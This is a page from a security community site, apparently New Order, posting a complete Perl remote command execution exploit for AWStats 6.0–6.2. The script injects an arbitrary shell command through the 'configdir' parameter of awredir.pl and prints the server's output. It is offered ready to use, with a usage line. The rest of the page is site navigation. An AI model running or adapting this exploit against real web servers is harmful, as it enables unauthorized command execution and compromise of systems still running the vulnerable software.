Main Forums Links The Vault Misc Wallpapers Login

features post Articles (Articles) search files, exploits & links sections: Article ThemesArticlesArticles -> EncryptionArticles -> HardwareArticles -> HistoryArticles -> LinkArticles -> NetworkingArticles -> ProgrammingArticles -> SecurityArticles -> SoftwareBoxster's LifestyleHOW-TO -> *nixHOW-TO -> HardwareHOW-TO -> NetworkingHOW-TO -> ProgrammingHOW-TO -> WindowsInterviewsNew Order NewsletterOut of the boxReviews -> BooksReviews -> HardwareReviews -> SoftwareSite NewsTheme of the monthViews online chat  server:    irc.xor.cx  channel:    #neworder random article Security Trends of 2008 and Predictions for 2009 gr00ve Dec 12 2008 quotable quotes Take time to invest in what is good about something, then expand on that Ngtfream

AWStats "configdir" Remote Command Execution Exploit (Perl script) @ Exploits -> Other     Jan 25 2005, 19:10 (UTC+0) furcalor writes:  #!/usr/bin/perl #---GHC---------------------------------# #Remote command execution exploit # #Product:                                        # #Advanced Web Statistics 6.0 - 6.2    # #URL:http://awstats.sourceforge.net  # #Greets & respects to our friends:     # #1dt.w0lf and all rst.void.ru              # #Special greets 2 d0G4                    # #& cr0n for link on bugtraq               # #---not-PRIVATE-already--------------# # bug found by iDEFENSE                 # # http://www.idefense.com/             # # application/poi/display?                 # # id=185&type=vulnerabilities          # # &flashstatus=true                         # #-----------------------------------------# use IO::Socket; $banner = " ################################################################# GHC 2005 Remote command execution exploit for: Advanced Web Statistics 6.0 - 6.2 Usage: >perl ./GHCaws.pl www.server.net /cgi-bin/awredir.pl \"uname -a\" ################################################################# "; $bug_param = 'configdir'; $id_start = 'b_exp'; $id_exit = 'e_exp'; $id_print = 0; $http_head = "\n\n"; sub Print_Report { $str = $_[0]; if ($str =~ m/$id_exit/i) { exit; } if ($str =~ m/$id_start/i) { $str =~ s/$id_start//ig; $id_print = 1; } if ($id_print == 1) { print "$str"; } } sub ConnectServer { $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "Error\n"; print $socket "GET $dir".'?'.$bug_param.'='."$expl HTTP/1.1\n"; print $socket "Host: $server\n"; print $socket "Accept: */*\n"; print $socket "Connection: close\n\n"; while ($report = <$socket>) { &Print_Report("$report"); } } print "$banner"; if ($ARGV[0] && $ARGV[1] && $ARGV[2]) { $server = $ARGV[0]; $dir = $ARGV[1]; $cmd = $ARGV[2]; } else { exit; } $expl = '|echo '.''.';echo '.$id_start.';'.$cmd.';echo '.$id_exit.';%00'; $expl =~ s/W/"%".sprintf("%x",ord($&))/eg; &ConnectServer; read comments (0) / write comment printer-friendly version Top of page

powered by

The content, logo and design of this site is © 2008 by particular authors, the New Order team and Box Network ltd.
For more information about New Order contact Marek
The privacy policy statement for Box Network.